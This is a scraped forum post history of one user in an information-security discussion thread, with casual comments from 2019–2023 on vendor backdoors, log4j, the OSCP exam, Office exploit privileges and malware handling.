|
Shinku ABOOKEN posted:any of you worked in non-operations infosec? i.e. dealing with risk analysis and policies and poo poo like that? how do you stay engaged? I couldn't. Eventually, being surrounded by people who don't actually know how computers work but dictate policy for them starts to eat at your brain and you have to move on.
|
#
¿
Apr 21, 2019 12:57
|
|
|
|
| # ¿ Apr 16, 2024 19:10 |
|
|
They should use double DES to double their security.
|
|
#
¿
May 8, 2019 00:35
|
|
|
The scourge of '13 we used to call it.
|
|
#
¿
Jun 16, 2019 19:28
|
|
|
GDPR US Equivalent now.
|
|
#
¿
Jul 14, 2019 17:32
|
|
|
Metadata's a bitch.
|
|
#
¿
Aug 23, 2019 22:20
|
|
|
Fortinet was formed by a group of people who previously made the Juniper Netscreen firewalls before they split off and made their own company. Juniper Screen firewalls also had a hardcoded backdoor: https://blog.rapid7.com/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor/ Not a great track record.
|
|
#
¿
Aug 30, 2019 17:10
|
|
|
Someones about to have a really loving bad day.
|
|
#
¿
Sep 8, 2019 23:53
|
|
|
Sweet jesus the OP's comment in that thread is amazing as well" Reddit Guy posted:I know what machine is it, I know rdp port is forward to that machine. But no logs in the rdp sessions. Maybe rdp is "pinging " something?
|
|
#
¿
Sep 9, 2019 00:09
|
|
|
quote:myhost bob = (ALL, !root) /usr/bin/vi I don't think I've ever seen a sudoers file configured in this manner, but I guess I'll toss it in the bin with the rest of the "priv esc under very specific conditions" bucket (there are thousands of things in this bucket). I'm sure it will show up in a CTF box one day.
|
|
#
¿
Oct 14, 2019 22:37
|
|
|
Thought that aspect of the Equifax breach had been known since around when the story first broke? https://www.miamiherald.com/news/nation-world/world/article173136746.html Sept 2017.
|
|
#
¿
Oct 18, 2019 19:56
|
|
|
On the other hand, free pen testing.
|
|
#
¿
Oct 21, 2019 17:54
|
|
|
CyberPingu posted:Welp, booking OSCP exam today. Good luck friend. Extreme lurker here, but if you need to bounce questions off of me or several other goons who have taken it PM me. If you have enough confidence to post about it here, you're probably ready because there are several people ITT who I have referenced to that are way smarter than me over the years. Special shout out especially to whoever ITT who made https://tls13.ulfheim.net/ who I have referenced several times to help educate colleagues in more ways than one. Simplifying complex ideas in this way is an underrated skill will only become more important as time goes on. I really appreciate this resource - it truly wraps a ton of different security concepts into a single thing that can be broken down to the simplest level. Thanks thread. It's possible I will never post here again due to dunning kruger but a lot of you out there have helped me and surely others in the cyber security field for questioning beliefs and pushing to learn more as a result </drunk posting> FungiCap fucked around with this message at 04:16 on Jan 17, 2021 |
|
#
¿
Jan 17, 2021 04:09
|
|
|
SCADA and internet access, name a better combo.
|
|
#
¿
Feb 9, 2021 02:53
|
|
|
Sarah Problem posted:Some gently caress head is randomly scanning a rfid at our smart card readers on the outside of our offices with a god drat jndi payload and the loving controller actually tried to call back. God drat you log4j. I only found it when scanning for outbound traffic attempts on our firewall. I found the payload when I grepped it’s logs. gently caress this poo poo Are you willing to share the name of the vendor of the controller?
|
|
#
¿
Dec 23, 2021 22:41
|
|
|
Sarah Problem posted:Ccure Holy poo poo, I knew it. iStars with their compact edition windows pieces of poo poo. goddamn the software for the physical security industry sucks rear end
|
|
#
¿
Dec 23, 2021 23:42
|
|
|
Why write memory-safe code when you can pay a third party for an EAC license and just hook your functions with code you never vetted!
|
|
#
¿
Mar 21, 2022 20:36
|
|
|
Ulf posted:hey what would be more interesting to people itt, a byte-by-byte breakdown of DTLS 1.2, or of QUIC? No preference, but just wanted to say cheers for making these. I've shown your TLS diagrams to several people now and everyone agrees that it's a great visual representation breakdown of TLS.
|
|
#
¿
Apr 6, 2022 14:20
|
|
|
Ulf posted:hi yossec! clicking here will make all your dreams come true: You are a beast.
|
|
#
¿
Apr 22, 2022 15:44
|
|
|
Chris Knight posted:lomarf This is a neat exploit, and I can confirm it works, but it shares so many similarities with CVE-2021-40444 that I haven't been able to get it past any endpoint defense product yet without being identified as malware.
|
|
#
¿
May 31, 2022 20:30
|
|
|
BrianRx posted:Nothing, I guess. My confusion is around how the exploit, which inherits its level of privilege from the application from which it was invoked, is able to install software or execute certain commands in PowerShell when that application does not have privileges to do so. Child processes (powershell) in Windows inherit the security permissions of the account running the parent process (office application). You do not need any administrator permissions to run code as a regular user . Open powershell as a user and type 1+1. Congrats, you executed code as a user. Open notepad as a user, congrats you executed code again as a user. Open the infected office document as a user, congrats powershell also spawned as a user. Instead of 1+1 it could also just be "download and execute these instructions". Again, you don't need special permissions to do that (although endpoint protection will probably stop it). FungiCap fucked around with this message at 12:56 on Jun 1, 2022 |
|
#
¿
Jun 1, 2022 12:54
|
|
|
Okay who hosed up all the electron apps? Context: MS Defender pushed a bad update that was flagging all electron apps as malware. It was a pretty brief window before being fixed in the early AM so most probably missed it (maybe Defender is right though). FungiCap fucked around with this message at 12:06 on Sep 5, 2022 |
|
#
¿
Sep 4, 2022 13:19
|
|
|
Truman Peyote posted:I'm Canadian but I'm spending a few weeks in Portugal. Today I'm at a coworking space, and they asked me to pay using PayPal. I tried to log in and it showed me a 2FA screen that would send a text message to my Canadian number. Oh poo poo, I thought, I don't have my Canadian SIM. But what's this, a button for changing my phone number right there on the 2FA screen...? lmfa o
|
|
#
¿
Sep 20, 2022 19:49
|
|
|
Please sit down everyone. Nearly every ISP is selling 100% of their netflow information to the government. https://www.vice.com/en/article/y3pnkw/us-military-bought-mass-monitoring-augury-team-cymru-browsing-email-data I know you're all shocked. Please remain calm.
|
|
#
¿
Sep 21, 2022 20:49
|
|
|
Shaggar posted:sure, but in this given context the US is probably actively looking to aid in the current protests against iran. worst case scenario you get on some list of potential assets for future exploitation. I thought HTTPS over TOR was verboten due to meta data leaks from it.
|
|
#
¿
Sep 23, 2022 19:53
|
|
|
Neito posted:Same. Big numbers are scary.
|
|
#
¿
Oct 18, 2022 17:58
|
|
|
The answer to ipv4 woes is always just another layer of NAT! I'm legitimately wondering if we will ever see mass IPv6 adoption in our lifetimes and I'm not even that old. Using a VM that NAT's through my host machine, which NAT's through my home router, which NAT's through my carrier level. FungiCap fucked around with this message at 19:46 on Oct 18, 2022 |
|
#
¿
Oct 18, 2022 19:44
|
|
|
Any security team that isn't pissing off devs probably isn't doing their job.
|
|
#
¿
Oct 20, 2022 18:58
|
|
|
Critical vulnerability: Use of OpenSSL 3.X causes incurable existential dread.
|
|
#
¿
Nov 1, 2022 16:47
|
|
|
Sickening posted:I saw what a paycheck of a total moron was who happened to work in information security was and decided "I could do that".
|
|
#
¿
Nov 28, 2022 23:37
|
|
|
Naming my new hash cracker 'Saltine'
|
|
#
¿
Dec 6, 2022 23:12
|
|
|
rafikki posted:Patch your fortis: Then throw it in the trash where it belongs.
|
|
#
¿
Dec 12, 2022 20:01
|
|
|
post hole digger posted:fortigates fine. Same devs who made juniper screen. Hard disagree but I guess ymmv. I would like to remind you at this time that it's the same people who hard-coded an intentional backdoor account and not even for the NSA this time! FungiCap fucked around with this message at 20:34 on Dec 12, 2022 |
|
#
¿
Dec 12, 2022 20:31
|
|
|
Like, I'll cop to the fact that all of these devices kind of suck in their own way so you just need to find the best of the worst and suck it up, but FortiNet and their lovely devices were literally ruining my life in 2016 and I will never stop hating them.
|
|
#
¿
Dec 12, 2022 21:01
|
|
|
I tried to read his book once on someone's recommendation and got about 1/3rd through before I had to stop. It's pretty masturbatory, even by autobiography standards.
|
|
#
¿
Dec 13, 2022 22:33
|
|
|
congrats okta for going open source.
|
|
#
¿
Dec 21, 2022 14:39
|
|
|
kitten smoothie posted:I still like the Symantec corporate malware tool we had at an old job that would randomly fail one in every one hundred builds or so by falsely alerting on intermediate build products and quarantining them mid build so the linker couldn’t find them later +1 to this happening to one of our devs. The security product does not notify the user at all, and so the poor dev was practically pulling their hair out in confusion and frustration.
|
|
#
¿
Jan 6, 2023 14:54
|
|
|
DELETE CASCADE posted:his reasoning was something like, he's less likely to be physically mugged than to have his password leaked in some hack. lol. I think this is the kind of person though where if you force them to speak out their logic and point out a few things candidly they would realize some of the foolishness with this line of thinking. FungiCap fucked around with this message at 21:26 on Jan 11, 2023 |
|
#
¿
Jan 11, 2023 21:23
|
|
|
Possibly poor wording? Having a RAT on your target and proxying through them could be construed as "remotely" and is an incredibly common tactic to use once you have positive C2 on your target. I'm giving the benefit of doubt here. If that is what they meant it was definitely worded really badly. disclaimer I didnt read the whole thing.
|
|
#
¿
Jan 14, 2023 18:29
|
|
|
colleague got DA immediately in an assessment many years ago because he sent a phish to a few employees and they correctly reported the phish. a security engineer (of like, 20+ years experience!) then interacted with the malware on his domain machine to "research" the malware despite having no idea what that entails (like seriously, you don't have any reverse engineering experience at all, what do you think you're going to find out?). i dont know what the pivot step from there to DA was, but i'm gonna take a wild guess and say cleartext admin creds on a file on the desktop.
|
|
#
¿
Jan 23, 2023 14:12
|
|
|
|
| # ¿ Apr 16, 2024 19:10 |
|
|
Encrypting the malware before moving it anywhere is standard operating procedure to render the payload inert. Always do this first if it wasn't received that way (and if it's not being received that way, ask yourself what the hell you're really doing lest you be like my security engineering friend).
|
|
#
¿
Jan 23, 2023 19:17
|
|